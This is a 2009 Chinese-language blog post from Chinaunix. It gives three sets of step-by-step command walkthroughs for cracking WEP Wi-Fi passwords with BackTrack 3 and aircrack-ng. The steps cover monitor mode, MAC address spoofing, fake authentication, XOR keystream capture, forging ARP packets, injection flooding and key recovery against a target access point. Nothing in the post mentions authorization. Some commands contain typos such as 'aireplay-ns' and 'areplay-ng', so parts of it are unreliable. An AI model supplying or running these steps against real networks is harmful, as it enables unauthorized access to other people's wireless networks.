Chinaunix首页 | 论坛 | 博客
  • 博客访问: 1990
  • 博文数量: 5
  • 博客积分: 280
  • 博客等级: 二等列兵
  • 技术积分: 90
  • 用 户 组: 普通用户
  • 注册时间: 2009-04-26 11:30
文章分类
文章存档

2011年(1)

2009年(4)

我的朋友
最近访客

分类: 系统运维

2009-04-26 11:41:08

1.启动BT3,打开一个窗口,输入ifconfig –a 查看网卡  (顺便记下自己网卡的mac,后面要用到)
   我的网卡是rausb0  
   再输入ifconfig –a rausb0加载usb网卡驱动 

2. 输入airmon-ng  start rausb0  6   激活网卡的Monitor模式 
   后面的6 是你要破解ap 的工作频道  根据实际,换成你破解的ap的实际工作频道(下同)

3. 输入抓包命令,抓包并查看你要破解的ap的essid   mac   
   输入命令  airodump-ng --ivs -w name -c 6 rausb0  ,其中,rausb0是你破解用的网卡接口名(下同),这样,你的窗口将显示一个工作站,可以看到你要破解的ap的essid 和mac ,并记下ap的essid 和mac。

4.上面窗口不关闭,另开一个窗口,输入命令,用自己的网卡连接要破解的ap 
   输入  aireplay-ng -1 0 -e ap的essid -a ap的mac -h 自己网卡的mac rausb0 
   这时,系统将回显

   Sending Authentication Request
   Authentication successful
   Sending Association Request    
   Association successful :-)

5.输入aireplay-ng  -5 -b ap的mac -h 自己网卡的mac rausb0  来获得xor文件
   如果一切顺利,系统将回显  Use this packet ?
   输入y  回车,将得到一个至关重要的xor文件。
   再输入ls  查看当前目录,你将看到刚才生成的一个后缀名为xor 的文件。

6.输入packetforge-ng -0 -a ap的mac -h 自己网卡的mac -k 255.255.255.255 -l 255.255.255.255 -y fragment -××××-××××.xor -w mrarp   其中,–l中的l是L的小写,别和1混淆,而其中的××××-××××.xor 是你刚才生成的文件名。

   系统回显:Wrote packet to: mrarp

7.输入aireplay-ng -2 –r mrarp  -x 1024 rausb0 ,发包攻击.其中,-x 1024 是限定发包速度,避免网卡死机,我选择的是1024。
   输入y  回车  攻击开始

   这时,前面的抓包窗口上的data将迅速增加。
   到数据增加到3万以上时,另开窗口,启动
   aircrack-ng -n 64 -b ap的mac name-01.ivs
   其中  64 是64位密码,如果是128位,换成128即可。
   完成, 以上~~ 即 WEP密码~~ :)

=======================================================================
0:
ifconfig wlan0 down
macchanger -m 00:11:22:33:44:55 wlan0
iwconfig wlan0 mode monitor   or //airmon-ng start wlan0
ifconfig wlan0 up

1:
ifconfig -a wlan0 up

2:
airmon-ng start wlan0 6
---------------------------

3:
airodump-ng -w name -c 6 wlan0
airodump-ng -w name -c 6 -b 00:19:e0:00:00:00 wlan0

4:
aireplay-ng -1 0 -e TP-LINK -a 00:19:e0:00:00:00 -h 00:c0:ca:00:00:00 wlan0
aireplay-ng -1 0 -e TP-LINK -a 00:19:e0:00:00:00 -h 00:11:22:33:44:55 wlan0

5:
aireplay-ng -5 -b 00:19:e0:00:00:00 -h 00:c0:ca:00:00:00 wlan0
aireplay-ng -5 -b 00:19:e0:00:00:00 -h 00:11:22:33:44:55 wlan0
y
fragment-xxxx-xxxxxx.xor

6:
packetforge-ng -0 -a 00:19:e0:00:00:00 -h 00:c0:ca:00:00:00 5 -k 255.255.255.255 -l 255.255.255.255 -y fragment-xxxx-xxxxxx.xor -w myarp
packetforge-ng -0 -a 00:19:e0:00:00:00 -h 00:11:22:33:44:55 5 -k 255.255.255.255 -l 255.255.255.255 -y fragment-1020-183229.xor -w myarp
7:
aireplay-ng -2 -r myarp -x 1024 wlan0
y
-----------------
3.1
aircrack-ng -z -b 00:19:e0:00:00:00 name*.cap

fragment-1020-183229.xor

================
20090407 x60 bt3
================

ifconfig -a
wlan0: 00:18:DE:00:00:00
  iwconfig
  spoonwep
  -------------------

1、用BT3启动,使用KDE。

2、modprobe -r iwl3945

3、modprobe ipwraw
注:以上两步为是为我的intel 3945ABG网卡加载驱动模块,第一步是卸载原有模块,第二步是加载新模块。
对于在gentoo下没有ipwraw的,可以去下面地址下载:
       wget
     下载后解压,然后make && make install && make install_ucode后,再加载此模块。

4、先使用Airoscript查看可用的无线网络
    不能在命令行下输入,要在菜单中找到Airosocript(在哪忘了,在B开头的菜单,找一会能找到)

5、打开新窗口,输入以下:
     airodump-ng --ivs -w outputs -c 6 wifi0
     注:outputs是保存的监控的数据文件名, 6是目标AP的Channel, wifi0是你的网卡设备号

6、打开新窗口,输入以下
    aireplay-ng -1 0 -e ESSID -a APMAC -h LOCALMAC wifi0
    以上ESSID是目标网络的ESSID, APMAC是目标AP的MAC  LOCALMAC是本地网卡的MAC,这些都可以从第4步中找
到,或者使用ifconfig、iwconfig、iwlist来查找

7、生成XOR文件用于向目标AP发送攻击包
    aireplay-ns -5 -b APMAC -h LOCALMAC wifi0
    出现Read packages字样后等待,有时读几百个包就结束,有时读几十万个也不结束,貌似要看人品。。。
    结束后出现 Use this packet ?后,输入y,在当前目录生成了.xor扩展保的文件。

8、准备发送攻击包
    packetforge-ng -o -a APMAC -h LOCALMAC -k 255.255.255.255 -l 255.255.255.255 -y fragment-xxxx.xor -w mrarp
    注:上面的-l是L的小写,.xor就是第6步生成的文件。

9、发送攻击包
     areplay-ng -2 -r mrarp -x 1024 wifi0
     1024是发包间隔,以避免攻击包速度太快将对方AP搞跨。
     执行此步后,会发现第4步输入后的窗口中,目标AP的记录中的DATA疯狂的增长,说明攻击成功。

10、当DATA增长至3万左右时,开新窗口,输入以下:
     aircrack-ng -n 64 -b APMAC outputs-0.ivs
     注:64指的是64位加密,如果是128的则换成128,.ivs是第4步命令时生成的数据文件,一般文件名就是第4步起的名字后加数字后缀。

    如果人品好,密码就会以16进制显示出来了!

阅读(217) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~